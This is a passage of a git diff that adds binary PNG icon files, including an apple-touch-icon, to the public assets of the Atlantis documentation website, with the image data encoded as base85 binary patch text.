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

literal 0
HcmV?d00001

diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png b/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png
new file mode 100644
index 0000000000000000000000000000000000000000..275239f5e1274082e39371e8fe33846e2e8126af
GIT binary patch
literal 11094
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
